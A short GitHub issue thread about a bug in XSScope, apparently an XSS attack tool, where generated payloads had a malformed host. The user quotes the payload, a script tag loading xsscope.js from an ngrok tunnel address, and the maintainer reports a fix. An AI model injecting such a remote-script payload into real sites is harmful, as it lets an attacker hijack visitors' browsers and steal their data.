### ISSUE TITLE
payload error 

### ISSUE THREAD

**Issue by pretech86** [kleiton0x00/XSScope#7]
when i generate payloads after connected manually with ngrok  i found it like this 
<script src="http://17170:17170/xsscope.js"></script>

it should be like this or i'me wrong
<script src="http://4.tcp.ngrok.io:17170/xsscope.js"></script>

**Comment by kleiton0x00** [comment]
Nice catch 😄 👍🏻  I already fixed this error. Please feel free to download the program again.
